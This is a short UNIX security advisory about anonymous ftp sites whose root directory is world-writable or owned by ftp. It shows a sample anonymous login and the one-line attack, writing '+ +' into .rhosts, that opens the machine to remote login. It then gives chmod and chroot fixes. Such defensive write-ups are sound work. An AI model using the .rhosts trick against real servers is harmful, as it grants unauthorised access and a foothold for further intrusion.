COMMAND
ftp
SYSTEMS AFFECTED
Any UNIX machine with an improperly configured ftp site
(permissions).
PROBLEM
A remote user can create a login account on your machine if the
root directory on your ftp site is world writable, or writable by
ftp. Someone can just login as follows:
evil/~> ftp target.victim.com
Connected to 666.666.666.666.
220 target FTP server (Version wu-1.2(1) Mon Feb 30 18:04:42 EST 1995) ready.
Name (666.666.666.666:hakd00d): ftp (or anonymous)
331 Guest login ok, send your complete e-mail address as password.
Password:
230-
230-Welcome to Victim Internet Services, Inc.
230-
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 7704
drwxrwxrwx 40 ftp other 8192 Jun 10 19:11 .
drwxr-xr-x 40 root other 8192 Jun 10 19:11 ..
lrwxrwxrwx 1 ftp other 8 May 24 12:19 1869 -> pub/1869
drwxrwxrwx 4 root root 4096 May 23 02:05 pix.tar.gz
lrwxrwxrwx 1 ftp other 8 May 24 12:19 idiot -> pub/idiot
We see that the current directory (.) is world writable AND owned
by ftp. I could now just do something like:
echo "+ +" > .rhosts
This gives an intruder an account on your machine, and allows him
to try to gain root locally, or use your machine as a jumping
point to other machines.
SOLUTION
Directories in the ftp site should NOT be owned by ftp. ALL
directories except "incoming" should be chmoded 755 (chmod 755
*). The "incoming" directory should be chmoded 733 (chmod 733
incoming). (files, btw should probably be 744) chroot the ftp
directory before allowing access so if they do get an account, it
will be difficult for them to access anything further back in the
tree (towards root).